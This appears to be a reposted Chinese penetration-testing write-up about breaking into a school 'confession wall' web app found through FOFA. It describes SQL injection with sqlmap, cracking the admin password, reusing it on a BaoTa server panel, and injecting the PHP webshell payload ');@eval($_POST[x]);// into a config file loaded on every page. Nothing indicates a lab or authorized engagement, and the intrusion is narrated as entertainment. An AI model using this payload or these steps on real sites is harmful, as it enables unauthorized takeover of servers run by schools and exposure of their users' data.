漏洞复现

在一次FOFA探索之旅中，偶然间发现很多学校使用了“XX表白墙”，如下所示：

扫一下这个站的端口，只发现一个宝塔登陆页面

开始对表白墙系统进行常规渗透，先尝试了SQL注入，发现' "等都被转义了，尝试编码以及宽字节注入未果

后台爆破了一波未果，正当我觉得没搞头的时候，Burp的xia SQL插件给我返回了一个“You have an error in your SQL syntax”（WTF ?，这个故事告诉我们，SQL注入多试几个点，有些功能可能过滤不全）

直接sqlmap一把梭

可惜不是dba，不管了，先把后台密码搞到

这md5真够让人无语的

进入后台，文件上传没有绕过去（白名单），我是真的菜啊

等等，刚才不是发现了一个宝塔登陆界面吗？试试同口令。。。呵呵呵

先看看网站源码，发现systemConfig.php中的内容有点眼熟

这不就是后台的基本设置吗，笑死，没想通为什么开发要把这些信息保存在php中

有经验的老师傅可能已经知道接下来怎么做了
既然这些参数是可控的，那直接插入php代码进去不就getshell了
经过一番尝试（我就尝试了两次），在基本设置中任意位置插入payload：');@eval($_POST[x]);//
点击保存，再次查看网页源码，发现php一句话插入成功

然而，所有的页面都引入了systemConfig.php，因此在任意位置都可以执行webshell

现在执行一下phpinfo试试水

坚守底线，点到为止

原文始发于微信公众号（赤弋安全团队）：渗透实战｜一次有趣的代码注入漏洞